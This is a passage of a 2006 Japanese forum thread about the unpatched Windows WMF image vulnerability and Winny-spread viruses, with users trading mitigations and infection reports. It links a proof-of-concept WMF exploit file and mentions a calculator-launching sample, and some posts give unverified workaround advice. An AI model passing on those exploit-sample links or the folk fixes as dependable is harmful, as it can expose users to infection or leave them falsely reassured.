ttp://kikuz0u.x0.com/wmf_exp.wmf メモ帳が起動するだけ
常駐保護無効にして両方ともデスクトップにでも保存
常駐保護有効にしてクリック
下は検出して勝手に削除される。
上はダウンロード中なら検出されたけど
ローカルだと検出されないというか中途半端に対応なのか?
マカフィー完全対応かと思ったけどだまされた・・

439 :[名無し]さん(bin+cue).rar:2006/01/01(日) 08:51:47 ID:TpIj1HxL0
質問なんですが
基本的にDLしただけではウィルスは感染しないんでしょうか?

440 :[名無し]さん(bin+cue).rar:2006/01/01(日) 08:54:05 ID:/CnZSgbs0
で、MSのパッチはマダー?

441 : 【大凶】 :2006/01/01(日) 08:57:43 ID:1jRBDKjF0
>>439
新年早々からどこ見てんだかなー >>388を嫁や

442 :[名無し]さん(bin+cue).rar:2006/01/01(日) 09:00:09 ID:TpIj1HxL0
>>441
スマン・・・よく見てなかった_| ̄|○
次から気をつける。

443 :[名無し]さん(bin+cue).rar:2006/01/01(日) 09:04:04 ID:2asU9LOJ0
AVG入れてるけどダメだな・・・・


ノートン2006先生の本物ハッシュお願い

444 : 【大凶】 【631円】 :2006/01/01(日) 09:04:55 ID:D+TRR+2Z0
しかしまぁよくこんなん思いつきよるな

445 : 【大吉】 【179円】 :2006/01/01(日) 09:42:59 ID:40bdnSfZ0
大凶のやつは気をつけろ

446 :[名無し]さん(bin+cue).rar:2006/01/01(日) 09:46:50 ID:1iYFDTkg0
パッチまだー?

447 :[名無し]さん(bin+cue).rar:2006/01/01(日) 11:23:16 ID:nerZzTEL0
>240
w2000でavast使ってみたら、htmlの奴しか反応しませんでした。
標準シールド→詳細な設定→スキャナ(追加)→
ファイルを開く毎に検査をオン→
bmp,dib,emf,gif,ico,jfif,jpg,jpe,jp2,jpeg,png,tif,tiff,wmf
を登録で両方とも反応するようになりました。
ここの神々はありがたいこってす。

448 :[名無し]さん(bin+cue).rar:2006/01/01(日) 11:28:09 ID:nerZzTEL0
あれ、janeでカキコするときにavasyトロイ反応。

449 :[名無し]さん(bin+cue).rar:2006/01/01(日) 11:36:34 ID:GSRkTKJh0
689 名前:番組の途中ですが名無しです[] 投稿日:2006/01/01(日) 02:33:54 ID:I03TNtGa0
http://www.f-secure.com/weblog/
ここ見たらwindowsのスペシャリストがとりあえずの解決パッチを出したらしい

http://www.hexblog.com/2005/12/wmf_vuln.html
ここで手に入るみたい

695 名前:689[] 投稿日:2006/01/01(日) 02:47:41 ID:I03TNtGa0
Windows WMF Metafile Vulnerability HotFix
This week a new vulnerability was found in Windows:

http://www.microsoft.com/technet/security/advisory/912840.mspx

Browsing the web was not safe anymore, regardless of the browser.
Microsoft will certainly come up with a thouroughly tested fix for it in the future,
but meanwhile I developed a temporary fix - I badly needed it.

The fix does not remove any functionality from the system, all pictures will continue
to be visible. You can download it here:

http://www.hexblog.com/security/files/wmffix_hexblog.exe

450 :[名無し]さん(bin+cue).rar:2006/01/01(日) 11:50:30 ID:bvKjdgqd0
>>448
>>358じゃね?

451 :[名無し]さん(bin+cue).rar:2006/01/01(日) 13:03:35 ID:BZ0OtfK20
ttp://www.f-secure.com/weblog/archives/archive-122005.html#00000757

ついでにwormも見つかったらしいね。

452 :[名無し]さん(bin+cue).rar:2006/01/01(日) 13:04:06 ID:TMokxW2T0
無敵ウイルスってどうやったら感染するの?
winRarとかで見える?

453 :[名無し]さん(bin+cue).rar:2006/01/01(日) 13:15:04 ID:4/BWiKeJ0
>>452
見たときに既に遅い


454 :[名無し]さん(bin+cue).rar:2006/01/01(日) 13:26:07 ID:EwFke5sP0
>>452
お前はもう死んでいるんだよ

455 :[名無し]さん(bin+cue).rar:2006/01/01(日) 13:32:46 ID:TMokxW2T0
無敵ウイルスの症状は?

456 :[名無し]さん(bin+cue).rar:2006/01/01(日) 13:35:36 ID:n3f/2nVC0
それはこれからウイルスを作る奴次第で変わる
とにかく、Windowsに致命的な欠陥があるという事が問題

457 :[名無し]さん(bin+cue).rar:2006/01/01(日) 13:56:21 ID:5/rYzk010
同じような質問が多すぎるから
誰かFAQ作ってくれよ

458 :[名無し]さん(bin+cue).rar:2006/01/01(日) 14:01:15 ID:+6cYyAg70
ttp://amatanoyo.blog16.fc2.com/blog-entry-132.html
このまとめでいいんじゃね

459 :[名無し]さん(bin+cue).rar:2006/01/01(日) 14:15:50 ID:eplnEi6c0
>>454
ワラタ

460 :[名無し]さん(bin+cue).rar:2006/01/01(日) 14:23:54 ID:AWUXKQ590
jpg、mpegとかは今まで気軽に見てたけど(精神的ブラクラはしかたがないが)もうそんな平和な時代じゃないんだな…
見た時点でHDDフォーマットとかレジストリいじられてファイルアップとかされるわけで…もうなんていうか世紀末?

461 :[名無し]さん(bin+cue).rar:2006/01/01(日) 14:28:43 ID:zaV4fpiN0
北斗の拳はもういいよ

462 :[名無し]さん(bin+cue).rar:2006/01/01(日) 14:31:30 ID:TMokxW2T0
テーレッテー

463 :[名無し]さん(bin+cue).rar:2006/01/01(日) 14:46:57 ID:shhcs2FJ0
バイナリ画面
ttp://vipquality.orz.hm/imageup/file/onz14710.png

解析の仕方がよくわからんな
ウィルスが起動してFaxViewプロセスがのこるのなら
ollydbgでメモリのトレースかければいいんだろうけど

464 :[名無し]さん(bin+cue).rar:2006/01/01(日) 15:02:44 ID:fJeOQjQP0
>>460
mpegは今のとこ安全。
問題のファイル(bmp,dib,emf,gif,ico,jfif,jpg,jpe,jp2,jpeg,png,tif,tiff,wmf )を、
デスクトップ上に展開もしくはダウンロードしたら、(未対策の場合)即アウト。

>>449、その手のリンクもおいそれとは踏めんなぁ。
緊急パッチとは言うが、画像ファイルをすべて別のDLLに割り当てただけみたい。
(他のアプリが、ダイレクトにShimgvw.dllをコールしてる場合は、意味ない)

465 :[名無し]さん(bin+cue).rar:2006/01/01(日) 15:14:22 ID:sJs002YN0
画像プレビューするソフトって何使えばいいのかな
vixとかだとちょっと違うし

466 :[名無し]さん(bin+cue).rar:2006/01/01(日) 15:15:44 ID:c+ZuX5jw0
shimgvw.dllをシステムフォルダから追い出しときゃ取り合えずOK?

467 :[名無し]さん(bin+cue).rar:2006/01/01(日) 15:17:32 ID:shhcs2FJ0
>>465
ちょっとめんどいがVixでできる(詳しくはヘルプに書いてある)
vix /v filename で単体ウィンドウが開く。

ファイルの関連付けで
vix /v %1
としないといけないけど。

Vix使ってんならSusieでも入れたらいいかも

468 :[名無し]さん(bin+cue).rar:2006/01/01(日) 15:26:39 ID:fJeOQjQP0
>>466
ダメ。そんな簡単なことじゃない。system32からshimgvw.dllを消しても
dllcashから復活。キャッシュから消しても、Windowsの保護機能が勝手に復活。
ファイル保護機能を無効にしても、なんかのきっかけで復活するらしい。

簡単じゃないから、MSのパッチ待ち

469 :[名無し]さん(bin+cue).rar:2006/01/01(日) 15:32:03 ID:LqbHlw0J0
shimgvw.dllを、バイナリエディタで破壊するとかはどうだ?

470 :[名無し]さん(bin+cue).rar:2006/01/01(日) 15:44:50 ID:shhcs2FJ0
>>469
システムDLLつーのはメモリに読み込まれるから
消したり改ざんしてももとに戻る。

ためしにOutLookExpressを削除してみるといい
すぐに復元されるから。

471 :[名無し]さん(bin+cue).rar:2006/01/01(日) 15:44:59 ID:fJeOQjQP0
>>464>>439
自己レス
すまん、その解決策はかなり有効みたいだ。
shimgvw.dllで問題のファイルをヒットしてSETABORTエスケープシーケンスがコールされても、
GDI32.dllの一部を使ってUSER32.DLLに到達しないようにする…と。
人柱いないかぁ…?(緊急私的パッチのアンインストも可能なようだが)

472 :[名無し]さん(bin+cue).rar:2006/01/01(日) 15:48:16 ID:shhcs2FJ0
>>471
VirtualPCかVMwareのスレの住人にたのんでみては?
たぶんだけどVMwarePlayer(無料)ではXPもちゃんと動作するし

473 :[名無し]さん(bin+cue).rar:2006/01/01(日) 15:51:36 ID:n3f/2nVC0
ttp://www.forest.impress.co.jp/article/2005/12/21/sharedtoolkit.html

これ使って>>449のパッチ特攻しても大丈夫かな?

474 :[名無し]さん(bin+cue).rar:2006/01/01(日) 15:53:17 ID:BZ0OtfK20
>>464
このスレでも何度か出てるけど拡張子をそれだけに限定する根拠は?
実際GIFとかも扱えるみたいだし、
shimgvw.dllが何を扱えるかのソースはあるの?

あと、wmffix_hexblog.exeを入れてIrfanViewで
147のruncalc.wmf開いたら何も起きなかったよ?

475 :[名無し]さん(bin+cue).rar:2006/01/01(日) 16:13:51 ID:Dje4OlL80
何も信じれないな。
怖い世の中だ

476 :[名無し]さん(bin+cue).rar:2006/01/01(日) 16:14:18 ID:LCxWO6Sf0
ま、何にしても近々パッチがくるから正直大した問題じゃない。


477 :[名無し]さん(bin+cue).rar:2006/01/01(日) 16:24:09 ID:3BS3CLx10
本当に近々か?

478 :[名無し]さん(bin+cue).rar:2006/01/01(日) 16:32:14 ID:zdlec2l50
     〃〃∩
      ⊂⌒ ( ・ー・) 近々とは来月か
        `ヽ_つ ⊂ノ 

479 :[名無し]さん(bin+cue).rar:2006/01/01(日) 16:36:13 ID:Co+xsCEK0
いや、今月

480 :[名無し]さん(bin+cue).rar:2006/01/01(日) 16:36:32 ID:ARuO2z930
      ∧_∧
      (´・ω・`)  基本はマッタリ
      ( ⊃┳⊃
     ε(_)ヘ⌒ヽフ
     (   ( ・ω・)
≡≡≡ ◎―◎⊃⊃


481 :[名無し]さん(bin+cue).rar:2006/01/01(日) 16:38:08 ID:ih7AvlIm0
1 名前:名無しでいいとも![] 投稿日:2006/01/01(日) 16:28:57.64 ID:80CSd9jC
皆さん気をつけましょう
http://www.f-secure.com/weblog/
We are aware that a new exploit for the WMF vulnerability has been published.
This one is much more advanced than the old one, and much more dangerous.

It enables clueless newcomers to easily craft highly variable and hard-to-detect
variations of image files. Images that take over computers when viewed. And do this
on all common Windows platforms. With no vendor patch for the vulnerability available.
Meaning that there are hundreds of millions of vulnerable computers in the net right now


パソコン暫くお休みさせておくかな

482 :[名無し]さん(bin+cue).rar:2006/01/01(日) 17:11:08 ID:hl1s8q+d0
【使用OS】 windowsXP
【WindowsUpdateしてるか】 している。
【使用AntiVirusソフト】 avast!
【AntiVirusをUpdateしてるか】している。
【ウイルススキャンの結果】 ヒットなし。
【オンラインスキャンしたなら結果】ヒットなし(トレンドマイクロ)。
【Winnyのバージョン】 2.0b7.1
【Winny歴、総DL量】 1年、20くらい?
【テンプレを読んだか】 読んだ。
【テンプレにある対策を実行したか】 再インストール以外した。
【症状、具体的に分かる限りすべて書く】
(一般コミック・雑誌)[ジャンプ]\[2006-8]HUNTERXHUNTER NO257[22]     .exeが実行されていた。
それ以外の被害は不明。

【何をしたらそんなことになったのか】
(一般コミック・雑誌) [ジャンプ] [2006-08] HUNTER×HUNTER No257 「2 2」 .exe
10.0 MB (10,485,760 バイト)
というフォルダに偽装されていたexeファイルを不注意にも実行してしまった。

【これまでにとった措置】
実行されていたファイルを削除。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runにあったレジストリデータ(一般コミック・雑誌)[ジャンプ]\[2006-8]HUNTERXHUNTER NO257[22]     .exeを削除。

削除したファイルをとりあえず復元して、どんなウイルスか調べようと思ったけど、自分のスキルじゃぜんぜん分からなかったorz

これなんでしょう?


483 :[名無し]さん(bin+cue).rar:2006/01/01(日) 17:13:45 ID:hl1s8q+d0
orz
これってwinnyもう使わなければ問題ないですかね?
どうしたらいいのか分かりません。
助けてください。

484 :[名無し]さん(bin+cue).rar:2006/01/01(日) 17:16:34 ID:ph89ZHoY0
>>483
つ[クリーンインスコ]

485 :[名無し]さん(bin+cue).rar:2006/01/01(日) 17:19:48 ID:O+D+eEDZ0
へへ・・画像開いたらHDが砕けたからね
ゲイツ・・なめとんのか!?

486 :[名無し]さん(bin+cue).rar:2006/01/01(日) 17:20:02 ID:/kWnJl9H0
>>483
それだけじゃよくわからないから
↓に書いてある対処法を一通り確認してみてはいかがでしょう。ちょっと手間ですが。

Winnyを狙ったワーム・ニュイルス情報 FAQ
(wikiのURL長すぎるのでttp://qrl.jp/index.phpを使用して短縮してあります)
ttp://qrl.jp/?197438

487 :[名無し]さん(bin+cue).rar:2006/01/01(日) 17:24:29 ID:hl1s8q+d0
>>486
とりあえず対処法は全て確認してみました。
現在、(一般コミック・雑誌)[ジャンプ]\[2006-8]HUNTERXHUNTER NO257[22]     .exe
はとりあえず実行されていないようです。
ぜんぜんウイルスチェックにも引っかからないので他に何かしているのかと考えるとちょっとよく分かりません。

488 :[名無し]さん(bin+cue).rar:2006/01/01(日) 17:26:11 ID:hl1s8q+d0
>>487
補足。
試した結果、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runのレジストリが変わっていたのでそれを訂正しました。


489 :[名無し]さん(bin+cue).rar:2006/01/01(日) 17:26:48 ID:5gTp/VjK0
オンラインウィルスチェックしてみれば

490 :[名無し]さん(bin+cue).rar:2006/01/01(日) 17:28:19 ID:uZLj7j3f0
>>487
もう一回ダブルクリックしてから出直しておいで
被害がないとどんなウィルスか答えようがない

491 :[名無し]さん(bin+cue).rar:2006/01/01(日) 17:30:16 ID:/kWnJl9H0
>>487
シマンテックのオンラインスキャン
ttp://www.symantec.com/region/jp/securitycheck/
製品版1年間分無料配布中
ttp://download.kingsoft.jp/is/index2.htm

この辺もやってみてはいかがでしょう。

んで、Cドライブ以外でウイルスみつからなかったら
Cドライブだけフォーマットして入れなおすのが無難かもしれません。
(圧縮ファイル内のスキャンもしてますよね?)

492 :[名無し]さん(bin+cue).rar:2006/01/01(日) 17:33:35 ID:hl1s8q+d0
>>491
試してみます。

493 :[名無し]さん(bin+cue).rar:2006/01/01(日) 17:52:06 ID:v6sKh5ae0
>>492
解凍ソフト何使ってる?

494 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:09:19 ID:fJeOQjQP0
>>474
GIFもリストに入ってるけど…
> shimgvw.dllが何を扱えるかのソースはあるの?

> This may help, but it is not sufficient. WMF files are recognized
> by a special header and the extension is not needed. The files
> could arrive using any extension, or embeded in Word or other
> documents.

なんて話もあるので、当てにはできない。あくまでExplorerがリンク
貼りそうな画像ファイルということでヨロ

現時点での最善の策は、>>449 と"regsvr32 -u %windir%\system32\shimgvw.dll"
の併用となっている。

495 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:12:30 ID:TMokxW2T0
MSが何日でパッチ出すかかけようぜ
俺の予想では休暇中の馬鹿ども総動員で一週間

496 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:22:28 ID:fJeOQjQP0
>>449の私的パッチの有用性を確認(XP SP2)
とりあえず検証用のWMFと、それをBMPにリネームしてローカルにおいた状態の
どちらとも発動せず(メモ帳/電卓が開かずWindows Picture and Fax Viewerが開く)

有用であるが、心底信頼はできないのは確か

497 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:25:16 ID:vtmEFn9P0
このスレ読み込んだらavastが反応したんだけどなんで?

498 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:27:12 ID:bvKjdgqd0
>>358

499 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:29:36 ID:BZ0OtfK20
>>494
ごめ、gifは素で見えてなかったorz

500 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:32:41 ID:HXGS2wze0
>>497
するんだよ・・・

501 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:34:28 ID:HXGS2wze0
てすt

502 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:40:01 ID:524ckJ3M0
>>495
早くて今月の定例パッチ
遅くて来月の定例パッチ

503 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:40:29 ID:an1OnoOS0
>>495
今週中に出るんでね?

504 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:40:58 ID:5/rYzk010
ほんとMSってダメだね。

505 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:48:45 ID:tLPA7PS90
別に駄目ってことは無いと思うが

506 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:51:18 ID:vtmEFn9P0
>>500
お前と同じ症状なのか。このスレ見れないじゃんか

507 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:58:59 ID:PCKdhilK0
>>506
専ブラ導入要検討

508 :[名無し]さん(bin+cue).rar:2006/01/01(日) 18:59:55 ID:QNtjyoEc0
>>449のパッチ、私的だけど一応信用できる凄腕の人が
出してる物だしソースもある。馬鹿のM$が公式パッチを
出すまでの繋ぎとしては最善の策かな?まあこのパッチは
欠陥を修繕するのではなく、先回りして抜け道を利用できないように
してるだけだから根本的な問題解決はM$を待つしかないのが
嫌だけどPCがやられるよりはいい罠。


M$が緊急パッチを出すのは早くても来週頃と読んだ。

509 :[名無し]さん(bin+cue).rar:2006/01/01(日) 19:01:10 ID:vtmEFn9P0
>>507
Live2chですけど

510 :[名無し]さん(bin+cue).rar:2006/01/01(日) 19:04:05 ID:TdVWNPDe0
だったらさっさとログ除外しろや

511 :[名無し]さん(bin+cue).rar:2006/01/01(日) 19:13:19 ID:PCKdhilK0
>>509
Live2chってIE系じゃなかったっけ?
自分はjaneにしてからこの手のものは反応しなくなった。

512 :[名無し]さん(bin+cue).rar:2006/01/01(日) 19:15:11 ID:hl1s8q+d0
>>491
無反応でしたorz
というか、いつの間にかショートカットができています。
プロパティをみるとなぜかショートカットが・・?
ちなみに、中身のファイル名はkey01.sysとかいうファイルでした。


513 :[名無し]さん(bin+cue).rar:2006/01/01(日) 19:21:36 ID:vbVKFyC60
>>511
Jane Viewだけどバイナリが表示されない?

514 :[名無し]さん(bin+cue).rar:2006/01/01(日) 19:22:36 ID:YEaw1cYi0
>>509
>>358に反応してるだけだから気にすんな

515 :[名無し]さん(bin+cue).rar:2006/01/01(日) 19:26:26 ID:WL4V/MFI0
無敵っていうウイルス、これ、正式名称はなんでしょうか?
今ウイルスバスターでスキャンしたんですが、何もでずでしたが、心配です。

516 :[名無し]さん(bin+cue).rar:2006/01/01(日) 19:37:51 ID:PCKdhilK0
>>513
今はstyleだけどバイナリが表示されたりしないなぁ。
その前はlovely使ってたけどDoeにしてからコードは走らなくなった。
viewはバイナリが表示されるんか。面白いなぁ。

517 :[名無し]さん(bin+cue).rar:2006/01/01(日) 19:39:02 ID:Ei0I6v/A0
わからない物を無理して使うからよ

518 :[名無し]さん(bin+cue).rar:2006/01/01(日) 19:50:58 ID:vtmEFn9P0
>>514
そっすか

519 :[名無し]さん(bin+cue).rar:2006/01/01(日) 19:57:23 ID:x/Gurh4O0
>>468>>470
全部いっぺんに消せよ。
修復にはXPのCDが必要と言われれば大丈夫。

520 :[名無し]さん(bin+cue).rar:2006/01/01(日) 19:59:04 ID:vA82omjj0
朝起きたら光プレミアムのウィルスバスターが、ANTINY.AとかCとかFとかGとかADとか
300以上見つけてきてましたorz
速攻駆除して、windowsアップデートもして綺麗に片付けたと思うんですが、
データ流出してるのかどうかわかる方法はないですか(´¬`;)

upfoderというフォルダや、ユーザー名\svchost.exeは作成されてないのと、port0にしてある環境なんですがorz

521 :[名無し]さん(bin+cue).rar:2006/01/01(日) 20:00:24 ID:vA82omjj0
UpFolderの間違いですorz

522 :[名無し]さん(bin+cue).rar:2006/01/01(日) 20:02:55 ID:uc6Fh0Wb0
>>520
祈れ ひたすら祈れ

523 :[名無し]さん(bin+cue).rar:2006/01/01(日) 20:04:08 ID:YEaw1cYi0
>>520
流出して困るデータがあるマシンでnyなんかやるなよ

524 :[名無し]さん(bin+cue).rar:2006/01/01(日) 20:04:58 ID:+Q147K8C0
>>520
ウィルスがどうこう以前にport0はwinnyするな。邪魔。

525 :[名無し]さん(bin+cue).rar:2006/01/01(日) 20:06:11 ID:NjyM35Av0
>>520
1週間ぐらい地引いてみたら?
詳しいコツはウォッチ系のスレで聞いてみるといい

526 :[名無し]さん(bin+cue).rar:2006/01/01(日) 20:11:19 ID:BrgKjsuj0
つか一度2chの住人が集まって金出し合って集団訴訟でも起こせばいいのに

527 :[名無し]さん(bin+cue).rar:2006/01/01(日) 20:33:33 ID:vA82omjj0
祈りながらウォッチ系スレでコツを聞いてみますorz
今度nyする時はサブPCでやる事にします。
アドバイスありがとうございました(´・ω・`)ノ

528 :[名無し]さん(bin+cue).rar:2006/01/01(日) 20:35:11 ID:uc6Fh0Wb0
>>527
懲りないね〜藻前
死んでも足洗えないな、コイシは

529 :[名無し]さん(bin+cue).rar:2006/01/01(日) 20:57:13 ID:MiN5WcJf0
例の問題はどうなった?
まだゲイシは何も動きなし?

530 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:07:03 ID:1iYFDTkg0
普通に気をつけてれば、サブ機でやるほどでもないんだけどね。
今回のWMFを利用したようなのを除けば。
単に、exe実行・なんでもかんでもデーモンでマウントだとかしなきゃいいだけなんだから。

531 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:11:52 ID:bwkGDPaj0
Autorun切っとけば、デーモンでマウントしてもいいんジャマイカ?

532 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:15:00 ID:uc6Fh0Wb0
で、マウントしたあとexe踏んであぼーんという運命

533 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:15:45 ID:G/YNYLTT0
>>531
Options→Automountのチェック外せばいいの?

534 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:19:34 ID:bwkGDPaj0
>>533
ttp://homepage2.nifty.com/winfaq/wxp/hints.html#811

535 : 【中吉】 【537円】 :2006/01/01(日) 21:20:31 ID:+feIYMj30
 今日、フォルダアイコン偽装の exe にひっかかって、ダブルクリックしてしまった。。。
VB2006 でも対応していなくて、どうやら、去年の 12/29 ごろに作られた新しいウィルスのようだ。
とりあえず、レジストリの Run とか書き換えられていたんで削除して、難を逃れたみたい。

 予防策として、ny ダウンロードフォルダと、WinRAR テンポラリフォルダの2つのフォルダで、
ファイル実行権限を拒否に設定して、exe 自体実行できないようにしたよ。
 注意点としては、「適用先」を「ファイルのみ」にしてから「フォルダのスキャン/ファイルの実行」を
「拒否」にすること。「適用先」を「このフォルダ、サブフォルダおよびファイル」にすると、exe実行だけでなく
フォルダをカレントフォルダにできなくなってしまう。
あと、解凍ツールのテンポラリフォルダは専用フォルダを作ってアクセス権を変更すること。

536 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:22:27 ID:uc6Fh0Wb0
>>535
ちゃんとウンチウイスル屋に提出していただきたい

537 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:22:42 ID:1iYFDTkg0
アレ?
切っても駄目なのなかったっけ?

無視リスト
漫画系はビューア (見れなかったからって解凍しない)
ゲーム系は鑑定人待ち
2chでの反応も見る。 (本物か偽かどうか)
データベースも使う。

とかしてりゃ、感染する事なんて絶対無いよ。
exe実行して感染したって騒いでる人が殆どだけど、ありえない。

538 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:24:47 ID:BZ0OtfK20
>>535
いや…なんだかとっても頑張ってるのはわかるけどもっと改善することがあると思うぞ…

539 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:35:49 ID:bwkGDPaj0
>>537
切ってもダメなのがあったのか。

> 無視リスト
> 漫画系はビューア (見れなかったからって解凍しない)
> ゲーム系は鑑定人待ち
> 2chでの反応も見る。 (本物か偽かどうか)
> データベースも使う。

それは当然だと思うぞ。
「2chでの反応」に関しては、新作の場合は長期的に、旧作は過去ログをたくさん観ないとダメだけどね。

540 : 【大吉】 【411円】 :2006/01/01(日) 21:37:05 ID:+feIYMj30
>>538
たとえば、どういう改善??

541 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:37:07 ID:1iYFDTkg0
>>539
いや
その「当然」の事をしてれば感染なんてしないわけで。

542 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:38:47 ID:uc6Fh0Wb0
その当然の段取りを踏まないヤシがexe踏んで「どうしましょう」なんて言ってきてウザイわけだが

543 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:44:35 ID:1iYFDTkg0
途中で送信しちゃった。

2chでの反応 は別に長期的に見る必要ないけどね。
本物かどうか気休め程度。
最終的に確認するのは自分だし。
今のところ、動画は気にする事ないし
圧縮ファイルは画像ファイルやゲームだとかで>>537で回避出来るから
長期的に見る必要が無い。

544 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:45:00 ID:bwkGDPaj0
その当然の中に、Autorun切ってマウントしてウイルスチェック、というのも含まれてるのよ。

545 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:46:33 ID:lTwzqIQs0
(C69)(同人誌)[れっさーぱんだ] 狂姦メイドカフェ 〜エスプレッソは愛欲の香り〜.zip KRXfH0AOR9 1,227,650 d9d8d0229ccb308d0ca0ef5f9547f76d
これウイルスだった・・バスターで検索して問題なしだったんで意識してなかった…バカだ…
まぁそれはおいといてバスターが反応してくれないからどんなウイルスかわかんないんだけど
実行したらIEが開いてページが黒い画面でそこに文字がダーーと出てきたんで即閉じた

546 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:47:08 ID:zaV4fpiN0
>>537
>切っても駄目なのなかったっけ?

オートラン切ってもマウントしたらアウトってことか?

547 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:47:34 ID:1iYFDTkg0
まぁ、気をつけてる奴同士レスし合っても意味ないわな。
何度も言われてる当然の事をしない奴をどうにかしないと。

548 : 【中吉】 【367円】 :2006/01/01(日) 21:48:19 ID:+feIYMj30
ワクチン常駐しているなら、autorun の有無はどちらでもいいと思う。

549 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:49:39 ID:bwkGDPaj0
>>543見ずにレスしてしまった。>>544
まあ、その辺は個人の判断だから、何もいえない。
2chで、「これ本物?」ってきいて、即「本物」って回答が来ても、それを鵜呑みにはできないってことを言いたかっただけ。

550 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:51:56 ID:uc6Fh0Wb0
>>548はワクチン対応の遅れで簡単に死亡する悪寒
こういうチョロいヤシがいるから困るんだよな


551 : 【大吉】 【1161円】 :2006/01/01(日) 21:52:57 ID:+feIYMj30
>>545
俺もそれにひっかかりました。ぼーとしてたんで、ダブルクリックしてしまった。。。
↓にレポート書きました。(役に立つかわからないけど)

nyで落とせるお勧め同人誌82
http://tmp5.2ch.net/test/read.cgi/download/1136023365/204

552 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:53:03 ID:bwkGDPaj0
>>548
ワクチン常駐でも、ダウンロード終了後すぐには反応せず、手動チェックで引っかかる場合はあるぞ。
オレの使ってるワクチンソフトが糞なのかもしれないけど。

553 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:55:13 ID:lTwzqIQs0
>>551
おぉありがとう! 

554 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:55:14 ID:fJeOQjQP0
>>515
無敵というか、「WMF脆弱性」という認識でしかないと思う。
大穴が空いている状態なので、トロイでもワームでも何でも感染させられる
正式名称は、各セキュリティソフトベンダでいろいろ。
先生の場合はBloodhound.Exploit.56。Bloodhoundは危険性のあるブツの汎用名

>>535-537
>>WMF脆弱性を利用したのが、既にnyにも出回っている>>433
そんな程度の対策では、あまーい。 by スピードワゴン

555 :[名無し]さん(bin+cue).rar:2006/01/01(日) 21:55:39 ID:1iYFDTkg0
>>548
>>535みたいな事をしてる奴が何を・・・。

>>549
うん。
だから気休め程度。
気にしてたら何も出来ないしね。

>>551
まさか、同人誌なのに解凍したの?

> 漫画系はビューア (見れなかったからって解凍しない)

556 :552:2006/01/01(日) 21:56:02 ID:bwkGDPaj0
しまった。
このレス>>552は忘れてくれ。
自分でも意味がわからん。

557 : 【だん吉】 【739円】 :2006/01/01(日) 21:57:05 ID:+feIYMj30
>>550
ワクチンが対応していない場合、手動でどこまでチェックできるかだが、
毎回、自分で、olly とかもちだしてきて解析してから実行するってこと?

>>552
autorun と、ダウンロードは関係ないよ。

558 : 【凶】 【460円】 :2006/01/01(日) 22:01:11 ID:+feIYMj30
>>555
> >>551
> まさか、同人誌なのに解凍したの?

すでに、ウィルスの報告が2chにかかれていたんで、ワクチンが反応するか
みようかなとか思って(ewido しか反応しないって報告があったんで)、
クリックしてたら、ぼーとしてたんで、ダブルクリックしちゃったんだよ。

559 :[名無し]さん(bin+cue).rar:2006/01/01(日) 22:01:42 ID:+oSBFw0y0
>>557
手動でできる事は多いし、自分でソレくらい解析するのは当たり前

560 :[名無し]さん(bin+cue).rar:2006/01/01(日) 22:04:03 ID:YJo57sjw0
なんかヤバげだな
バスター未反応なのか

561 :[名無し]さん(bin+cue).rar:2006/01/01(日) 22:14:04 ID:bwkGDPaj0
>>557
マウントした後で、exe実行する前に、手動でチェックするよね。普通。
それをいいたかったのだが。

562 :[名無し]さん(bin+cue).rar:2006/01/01(日) 22:28:17 ID:Aq2zirwS0
D:\WINNT\system32\msvcp.exe は Trojan.Sientok に感染しています。
D:\WINNT\system32\wbem\(値の設定なし)                                                                                 .exe は Trojan.Sientok に感染しています。
D:\WINNT\system32\drivers\svchost.exe は W32.HLLW.Antinny.G に感染しています。
D:\DL program\openjanedoe-0.1.12.2\Logs\2ch\実況ch\番組ch(フジ)\1132042490.dat は Bloodhound.Exploit.6 に感染しています。

新年早々最悪。

563 :[名無し]さん(bin+cue).rar:2006/01/01(日) 22:29:51 ID:0yD5bBJV0
regsvr32 -u %windir%\system32\shimgvw.dll
実行しても
「RegSvr32
Loadlibrary("C:\WINDOWS\System\shimgvw.dll")
GetLastError returns0x00000485」

って怒られるんだがどういうことなんですか?


564 :[名無し]さん(bin+cue).rar:2006/01/01(日) 22:33:02 ID:qc9aZCxw0
とりあえずshimgvw.dllへのアクセス不能にして安全確保できているからok。
後はなんか気持ち悪いから、MSがさっさと対応するのを待つしかないか。

565 :[名無し]さん(bin+cue).rar:2006/01/01(日) 22:39:32 ID:lTwzqIQs0
>>545
いま再起動したけど
そしたらか、する前かわからんが、nyのUpFolder.txtが
[  ]
Path=C:\WINDOWS\Pornoshop_eloments
Trip=
